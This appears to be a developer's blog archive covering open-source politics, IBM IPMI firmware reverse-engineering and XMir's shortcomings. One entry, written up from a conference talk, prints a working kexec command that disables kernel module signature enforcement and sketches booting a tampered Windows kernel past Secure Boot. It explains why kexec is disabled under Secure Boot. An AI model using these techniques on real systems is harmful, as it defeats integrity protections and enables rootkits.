Piston, an Openstack-in-a-box vendor[1] are a sponsor of the Red Hat[2] Summit this year. Last week they briefly ceased to be for no publicly stated reason, although it's been sugggested that this was in response to Piston winning a contract that Red Hat was also bidding on. This situation didn't last for long - Red Hat's CTO tweeted that this was an error and that Red Hat would pay Piston's sponsorship fee for them.

To Red Hat's credit, having the CTO immediately and publicly accept responsibility and offer reparations seems like the best thing they could possibly do in the situation and demonstrates that there are members of senior management who clearly understand the importance of community collaboration to Red Hat's success. But that leaves open the question of how this happened in the first place.

Red Hat is big on collaboration. Workers get copies of the Red Hat Brand Book, an amazingly well-written description of how Red Hat depends on the wider community. New hire induction sessions stress the importance of open source and collaboration. Red Hat staff are at the heart of many vital free software projects. As far as fundamentally Getting It is concerned, Red Hat are a standard to aspire to.

Which is why something like this is somewhat unexpected. Someone in Red Hat made a deliberate choice to exclude Piston from the Summit. If the suggestion that this was because of commercial concerns is true, it's antithetical to the Red Hat Way. Piston are a contributor to upstream Openstack, just as Red Hat are. If Piston can do a better job of selling that code than Red Hat can, the lesson that Red Hat should take away is that they need to do a better job - not punish someone else for doing so.

However, it's not entirely without precedent. The most obvious example is the change to kernel packaging that happened during the RHEL 6 development cycle. Previous releases had included each individual modification that Red Hat made to the kernel as a separate patch. From RHEL 6 onward, all these patches are merged into one giant patch. This was intended to make it harder for vendors like Oracle to compete with RHEL by taking patches from upcoming RHEL point releases, backporting them to older ones and then selling that to Red Hat customers. It obviously also had the effect of hurting other distributions such as Debian who were shipping 2.6.32-based kernels - bugs that were fixed in RHEL had to be separately fixed in Debian, despite Red Hat continuing to benefit from the work Debian put into the stable 2.6.32 point releases.

It's almost three years since that argument erupted, and by and large the community seems to have accepted that the harm Oracle were doing to Red Hat (while giving almost nothing back in return) justified the change. The parallel argument in the Piston case might be that there's no reason for Red Hat to give advertising space to a company that's doing a better job of selling Red Hat's code than Red Hat are. But the two cases aren't really equal - Oracle are a massively larger vendor who take significantly more from the Linux community than they contribute back. Piston aren't.

Which brings us back to how this could have happened in the first place. The Red Hat company culture is supposed to prevent people from thinking that this kind of thing is acceptable, but in this case someone obviously did. Years of Red Hat already having strong standing in a range of open source communities may have engendered some degree of complacency and allowed some within the company to lose track of how important Red Hat's community interactions are in perpetuating that standing. This specific case may have been resolved without any further fallout, but it should really trigger an examination of whether the reality of the company culture still matches the theory. The alternative is that this kind of event becomes the norm rather than the exception, and it takes far less time to lose community goodwill than it takes to build it in the first place.

[1] And, in the spirit of full disclosure, a competitor to my current employer
[2] Furthering the spirit of full disclosure, a former employer
2014-02-10 11:14 am
Entry tags:

IBM's remote firmware configuration protocol

I spent last week looking into the firmware configuration protocol used on current IBM system X servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (ie, running on the machine you want to reconfigure) or out of band (ie, running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). I'm not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to script, so I'm gradually reimplementing them in Python. Doing that was fairly straightforward for Dell and Cisco, both of whom document their configuration protocol. IBM, on the other hand, don't. My first plan was to just look at the wire protocol, but it turns out that it's using IPMI 2.0 to communicate and that means that the traffic is encrypted. So, obviously, time to spend a while in gdb.

The most important lesson I learned last time I did this was "Check whether the vendor tool has a debug option". ASU didn't mention one in its help text and there was no sign of a getopt string, so this took a little longer - but nm helpfully showed a function called DebugLog and setting a breakpoint on that in gdb showed it being called a bunch of the time, so woo. Stepping through the function revealed that it was checking the value of a variable, and looking for other references to that variable in objdump revealed a -l argument. Setting that to 255 gave me rather a lot of output. Nearby was a reference to --showsptraffic, and passing that as well gave me output like:

BMC Sent: 2e 90 4d 4f 00 06 63 6f 6e 66 69 67 2e 65 66 69
BMC Recv: 00 4d 4f 00 21 9e 00 00

which was extremely promising. 2e is IPMI-speak for an OEM specific command, which seemed pretty plausible. 4d 4f 00 is 20301 in decimal, which is the IANA enterprise number for IBM's system X division (this is required by the IPMI spec, it wasn't an inspired piece of deduction on my behalf). 63 6f 6e 66 69 67 2e 65 66 69 is ASCII for config.xml. That left 90 and 06 to figure out. 90 appeared in all of the traces, so it appears to be the command to indicate that the remaining data is destined for the IMM. The prior debug output indicated that we were in the QuerySize function, so 06 presumably means… query the size. And this is supported by the response - 00 (a status code), 4d 4f 00 (the IANA enterprise number again, to indicate that the responding device is speaking the same protocol as you) and 21 9e 00 00 - or, in rational endianness, 40481, an entirely plausible size.

Once I'd got that far the rest started falling into place fairly quickly. 01 rather than 06 indicated a file open request, returning a four byte file handle of some description. 02 was read, 03 was write and 05 was close. Hacking this together with pyghmi meant I could open a file and read it. Success!

Well, kind of. I was getting back a large blob of binary. The debug trace showed calls to an EfiDecompress function, so on a whim I tried just decompressing it using the standard UEFI compression format. Shockingly, it worked and now I had a 345K XML blob and presumably many more problems than I'd previously had. Parsing the XML was fairly straightforward, and now I could retrieve the full set of config options, along with the default, current and possible values for them.

Making changes was pretty much just the reverse of this. A small XML blob containing the new values is compressed and written to asu_update.efi. One of the elements is a random identifier, which will then appear in another file called config_log along with a status. Just keep re-reading this until the value changes to CM_DONE and we're good.

The in-band configuration appears to be identical, but rather than sending commands over the wire they're send through the system's IPMI controller directly. Yes, this does mean that it's sending compressed XML through a single io port. Yes, I'd rather be drinking.

I've documented the protocol here and hope to be able to release this code before too long - right now I'm trying to nail down the interface a little, but it's broadly working.
2014-01-20 10:45 am
Entry tags:

Not all CLAs are equal

Contributor License Agreements ("CLAs") are a mechanism for an upstream software developer to insist that contributors grant the upstream developer some additional set of rights. These range in extent - some CLAs require that the contributor reassign their copyright over the contribution to the upstream developer, some merely provide the upstream developer with a grant of rights that aren't explicit in the software license (such as an explicit patent grant for a contribution licensed under a BSD-style license).

CLAs aren't new. FSF-copyrighted projects have been using copyright assignment since at least 1985 - in return, the FSF promise that the software will always be distributed under a copyleft-style license. For over a decade, Apache Software Foundation projects have required that contributors sign a CLA that allows them to retain copyright, but grants the ASF the right to relicense the work as it wishes. For the most part, this hasn't been terribly controversial.

So why do people object so much when Canonical do it? I've written about this in the context of Mir before, but it's worth expanding on the general case. The FSF's copyright assignment ensures that contributions to GPLed software will only be distributed under GPL-style licenses. The Apache CLA permits the ASF to relicense a contribution under a proprietary license, but the Apache license allows anyone to do that anyway. Going through Wikipedia's list of CLA users, the majority cover projects that are under BSD- or Apache-style licenses, with a couple of cases covering GPLed projects with a promise that any contributions will only be distributed under GPL-like licenses[1]. Either everyone can produce proprietary derivative works, or nobody can.

In contrast, Canonical ship software under the GPLv3 family of licenses (GPL, AGPL and LGPL) but require that contributors sign an agreement that permits Canonical to relicense their contributions under a proprietary license. This is a fundamentally different situation to almost all widely accepted CLAs, and it's disingenuous for Canonical to defend their CLA by pointing out the broad community uptake of, for instance, the Apache CLA.

Canonical could easily replace their CLA with one that removed this asymmetry - Project Harmony, the basis of Canonical's CLA, permits you to specify an "inbound equals outbound" agreement that prevents upstream from relicensing under a proprietary license[2]. Canonical's deliberate choice not to do so just strengthens the argument that the CLA is primarily about wanting to produce proprietary versions of software rather than wanting to strengthen their case in any copyright or patent disputes. It's unsurprising that people feel disinclined to contribute to projects under those circumstances, and it's difficult to understand why Canonical simultaneously insist on this hostile behaviour and bemoan the lack of community contribution to Canonical projects.

[1] The one major exception is the Digia/Qt project CLA, which covers an LGPLed work but makes it entirely clear that Digia will ship your contributions under proprietary licenses as well. At least they're honest.

[2] See the various options in section 2.1(d) here. Canonical chose option five. If they'd chosen option one instead, this wouldn't be a problem.
2013-12-03 03:06 pm
Entry tags:

Subverting security with kexec

(Discussion of a presentation I gave at Kiwicon last month)

Kexec is a Linux kernel feature intended to allow the booting of a replacement kernel at runtime. There's a few reasons you might want to do that, such as using Linux as a bootloader[1], rebooting without having to wait for the firmware to reinitialise or booting into a minimal kernel and userspace that can be booted on crash in order to save system state for later analysis.

But kexec's significantly more flexible than this. The kexec system call interface takes a list of segments (ie, pointers to a userspace buffer and the desired target destination) and an entry point. The kernel relocates those segments and jumps to the entry point. That entry point is typically code referred to as purgatory, due to the fact that it lives between the world of the first kernel and the world of the second kernel. The purgatory code sets up the environment for the second kernel and then jumps to it. The first kernel doesn't need to know anything about what the second kernel is or does. While it's conventional to load Linux, you can load just about anything.

The most important thing to note here is that none of this is signed. In other words, despite us having a robust in-kernel mechanism for ensuring that only signed modules can be inserted into the kernel, root can still load arbitrary code via kexec and execute it. This seems like a somewhat irritating way to patch the running kernel, so thankfully there's a much more straightforward approach.

I modified kexec to add an additional loader and uploaded the code here. Build and install it. Make sure that /sys/module/module/parameters/sig_enforce on your system is "Y". Then, as root, do something like:
kexec --type="dummy" --address=`printf "0x%x" $(( $(grep "B sig_enforce" /proc/kallsyms | awk '{print "0x"$1}') & 0x7fffffff))` --value=0 --load-preserve-context --mem-max=0x10000 /bin/true
to load it[2]. Now do kexec -e and watch colours flash and check /sys/module/module/parameters/sig_enforce again.

The beauty of this approach is that it doesn't rely on any kernel bugs - it's using kernel functionality that was explicitly designed to let you do this kind of thing (ie, run arbitrary code in ring 0). There's not really any way to fix it beyond adding a new system call that has rather tighter restrictions on the binaries that can be loaded. If you're using signed modules but still permit kexec, you're not really adding any additional security.

But that's not the most interesting way to use kexec. If you can load arbitrary code into the kernel, you can load anything. Including, say, the Windows kernel. ReactOS provides a bootloader that's able to boot the Windows 2003 kernel, and it shouldn't be too difficult for a sufficiently enterprising individual to work out how to get Windows 8 booting. Things are a little trickier on UEFI - you need to tell the firmware which virtual→physical map to use, and you can only do it once. If Linux has already done that, it's going to be difficult to set up a different map for Windows. Thankfully, there's an easy workaround. Just boot with the "noefi" kernel argument and the kernel will skip UEFI setup, letting you set up your own map.

Why would you want to do this? The most obvious reason is avoiding Secure Boot restrictions. Secure Boot, if enabled, is explicitly designed to stop you booting modified kernels unless you've added your own keys. But if you boot a signed Linux distribution with kexec enabled (like, say, Ubuntu) then you're able to boot a modified Windows kernel that will still believe it was booted securely. That means you can disable stuff like the Early Launch Anti-Malware feature or driver signing, or just stick whatever code you want directly into the kernel. In most cases all you'd need for this would be a bootloader, kernel and an initrd containing support for the main storage, an ntfs driver and a copy of kexec-tools. That should be well under 10MB, so it'll easily fit on the EFI system partition. Copy it over the Windows bootloader and you should be able to boot a modified Windows kernel without any terribly obvious graphical glitches in the process.

And that's the story of why kexec is disabled on Fedora when Secure Boot is enabled.

[1] That way you only have to write most drivers once
[2] The address section finds the address of the sig_enforce symbol in the kernel, and the value argument tells the dummy code what value to set that address to. --load-preserve-context informs the kernel that it should save hardware state in order to permit returning to the original kernel. --mem-max indicates the highest address that the kernel needs to back up. /bin/true is just there to satisfy the argument parser.
2013-10-16 01:48 pm
Entry tags:

Standing for the Linux Foundation Technical Advisory Board

According to its charter, the Linux Foundation Technical Advisory Board exists "to advise The Linux Foundation Board of Directors (Board) and the management of The Linux Foundation (Management) on matters related to supporting the technical agenda of The Linux Foundation". It consists of 10 members, with 5 seats up for election each year. Elections take place at an event at Kernel Summit, but are also open to attendees of whichever conference is colocated with the Kernel Summit that year. The election announcement is emailed to the Linux kernel list and tech-board-discuss, a mostly moribund list that springs into life once a year for election announcements.

This arrangement seemed odd to me even back in 2007. Back then the Linux Foundation was already sponsoring development of certain non-kernel components, and now that list is even larger. While nominally open to all, nominations for the TAB tend to end up being people actively involved in the kernel community. That's probably better than people limited to any other single technical community (kernel developers tend to end up dealing with bugs from a fairly wide range of projects, so they're not entirely unaware of what other people have to deal with), but it still seems suboptimal. The current membership is mostly limited to people who spend little to no time working with userspace developers, let alone anyone active in other Linux Foundation projects. I don't think this is a good thing

So, after several years of considering it, I'm finally standing for the TAB. I've been an active developer at most levels of the Linux stack, from the kernel through to desktop environments. I've worked closely with distributions. I've even worked closely with firmware developers. I'm not intimately involved in any of the other Linux Foundation projects, but I have experience that allows me to better understand their needs and motivations than I'd have from having spent my entire life living in the kernel. Being on the TAB would make it easier to ensure that these projects are represented in a meaningful way.

Of the other people who I know are standing (and this list may well grow longer), I'm inclined to vote for:
  • Greg Kroah Hartman - while we've disagreed on a range of points, Greg's worked closely with userspace developers and even represents the Linux Foundation on the UEFI Forum. He's able to provide a wide range of expertise to the TAB and it benefits from that.
  • Jon Corbet - Jon's work on LWN should need no introduction. He's done an amazing job of keeping track of a range of technical developments across the entire Linux community, so is uniquely well suited to making sure that a range of opinions is represented.
  • Sarah Sharp - Sarah's certainly primarily a kernel developer, but she's been the loudest voice calling for the kernel community to spend some time thinking about whether it's as welcoming as it could be. Increasing the diversity of the kernel community allows us to hear a wider range of technical viewpoints, which benefits both the kernel and everything that depends on it.

The election is currently scheduled to be National Museum in Edinburgh on the evening of the 23rd of October. If you're attending Linuxcon or one of the colocated events, please do come along and vote.

(Updated to correct a typo)
2013-10-15 10:10 am
Entry tags:

Hacker News is a social echo chamber

Hacker News is a fairly influential link aggregation site, with stories submitted and voted on by users. As explained in the FAQ, the ranking of stories is roughly determined by the number of votes divided by a function of the time since submission. It's not a huge traffic driver (my personal experience of stories on the front page is on the order of 30,000 hits), but it's notable because the demographic tends to include a more technically literate and influential set of readers than most other sites. The discussion that ensues from technical posts often includes meaningful feedback from domain experts. Stories that appear there are likely to be noted by technology workers, especially in the Silicon Valley startup field[1].

That rather specific demographic appears to correlate with other traits. There's a rather more techno-libertarian bias on Hacker News than on most general discussion forums, which is consistent with the startup-oriented culture that it springs from - the desire to provide disruptive solutions to real world problems tends to collide with existing regulatory frameworks, so it's unsurprising that a belief in individual rights and small government would overlap with US startup culture. There's a leaning towards the use of web technologies rather than traditional client applications, which matches what people are doing in the rest of the world. And there's more enthusiasm for liberal open-source licenses over Copyleft licenses, which makes sense in a web-focused environment (as I wrote about here).

Now, personally I'm a big-government, client-app, Copyleft kind of person, but for the most part I don't think the above is actively dangerous. It's inevitable that political views will vary, we'll probably continue to cycle between thick and thin clients for generations and nobody's ever going to demonstrably prove that one licensing model deserves to win over another. But what is important is that the ongoing debates between these opinions be driven by facts, and that it remain obvious that these disagreements exist. As far as technical (and even political) discussion goes, Hacker News doesn't seem to
have a problem with that. Disagreeing with the orthodoxy is tolerated.


This seems less true when it comes to social issues. When a posting discussing the myth of the natural born programmer[2] hit the front page, the top rated comment is Paul Graham[3] off-handedly discounting the conclusions drawn. The original story linked to a review of peer-reviewed scientific research. Graham simply discounts it on the basis of his preconceptions. Shortly afterwards, the story plummeted off the front page, now surrounded by stories posted around the same time but with much lower scores.

How does this happen? There's two publicised methods which can result in stories dropping down the order. Users with high karma scores (either via submitting popular stories or writing popular comments) are able to flag submissions, and if enough do so then a negative weighting is applied to the story. There's also a flamewar detector, a heuristic that attempts to detect contentious subjects and pushes them off the front page.

The effect of both is to enforce the status quo of social beliefs. Stories that appear to challenge the narrative that good programmers are just naturally talented tend to vanish. Stories that discuss the difficulties faced by minorities in our field are summarily disappeared. There are no social problems in the technology industry. We have always been at war with Eastasia.

This isn't healthy. We don't improve the state of the software industry by hiding stories that expose conflicts. Flamewars don't solve problems, but without them we'd be entirely unaware of how much of a victim blaming mentality exists amongst our peers. It's true that conflict may reinforce preconceptions, causing people to dig in as they defend their beliefs. However, the absence of conflict does nothing to counteract that. If you're never exposed to opinions you disagree with, you'll never question your existing beliefs.

Hacker News is a privately run site and nobody's under any obligation to change how they choose to run it. But the focus on avoiding conflict to such an extent that controversial stories receive less exposure than ones that fit people's existing beliefs doesn't enhance our community. If we want to be able to use technology as an instrument of beneficial change to society as a whole, we benefit from building a diverse and welcoming community and questioning our preconceptions. Building a social echo chamber risks marginalising us from the rest of society, gradually becoming ignored and irrelevant as our self-reinforcing opinions drift ever further away from the mainstream. It doesn't help anybody.

[1] During the batch of interviews I did last year, two separate interviewers both mentioned a story they'd read on Hacker News that turned out to have been written by me. I'm not saying that that's what determined a hire/don't hire decision, but it seems likely that it helped.
[2] The article in question discusses the pervasive idea that some people are inherently good programmers. It turns out that perpetuating the idea that some people are just born good at a particular skill actually discourages others from even trying to learn it, even those who are just as capable.
[3] One of the co-founders of Y-Combinator and creator of Hacker News.

(Edited to fix a footnote reference)
2013-10-02 11:42 am
Entry tags:

The state of XMir

XMir's been delayed from Ubuntu 13.10. The stated reason is that multi-monitor support isn't sufficiently reliable. That's true, but it's far from the only problem that XMir still has:

  • It's still broken on some single-monitor systems

  • Some machines have display corruption. There are writes to freed memory. To be fair, some of the behaviour that's been seen has been down to underlying bugs in the Xorg drivers that were never triggered under normal use but are hit by XMir. Others are down to implicit assumptions made in the drivers that XMir happens to violate. The problem is that there doesn't appear to have been enough room in the schedule to deal with these interactions, presumably because nobody accounted for the inevitable "This thing we thought would be easy turns out to be difficult" part of the project.

  • The input driver bug still isn't really fixed

  • I've mentioned this bug before. It's now marked "Fix released" which is kind of true but not really. Mir now tells XMir that the VT is changing before the VT is changed, but it doesn't wait for that to complete before switching the VTs. Until XMir is scheduled and runs, it's still receiving input events. In most circumstances that window is small, so there's no real risk of triggering it accidentally.

    There's one corner case where it might still cause problems. Simply running isn't enough - XMir has to make progress through its event loop. That'll only happen if the X server is processing its wakeup events, and it's possible to effectively stall that by submitting a sufficiently awkward drawing request to the server. The X server will appear to freeze, and if the user then attempts to work out what's going on by switching to a VT and logging in, those input events will still be going to XMir. It's left as an exercise to the reader to construct ways to take advantage of this.

    This can't happen in Xorg because the VT switch is blocked until the input devices have been released. Mir could have done the same, but doesn't because of a conscious design decision - in the Ubuntu Phone world, clients stop doing things when they're told to. Ubuntu Desktop is expected to behave the same way.

    This is an unfortunate situation to be in. Ubuntu Desktop was told that they were switching to XMir, but Mir development seems to be driven primarily by the needs of Ubuntu Phone. XMir has to do things that no other Mir client will ever cope with, and unless Mir development takes that into account it's inevitably going to suffer breakage like this. Canonical management needs to resolve this if there's any hope of ever shipping XMir as the default desktop environment.

  • It's still missing features

  • XMir doesn't support colour profiles. XRandR properties aren't exposed, so there's no way to control TV output encoding or overscan. There's still no hardware cursor support. Switching to XMir now would reduce functionality without providing any user-visible gain.


It's clear that XMir has turned into a larger project than Canonical had originally anticipated, but that's hardly surprising. There's only one developer with previous X experience working on it full-time, and the announced schedule provided no opportunity to deal with unexpected problems. As if that weren't enough, there's obvious conflict between Ubuntu Desktop and Ubuntu Phone when it comes to developer time and required functionality. The one hardware vendor who's willing to take a public stand has demonstrated that they have no interest in supporting XMir, despite Canonical assuring people that they were already engaging in productive negotiations with GPU manufacturers.

Multiple monitor support may be the single most obvious feature where XMir is lacking, but it's not the only one. Technically and politically, this code is a long way from being ready for prime time. Without significant community contribution, Canonical need to focus on prioritising it appropriately rather than expecting a tiny number of developers to perform miracles. Or, alternatively, they could just drop XMir entirely and focus on Unity 8.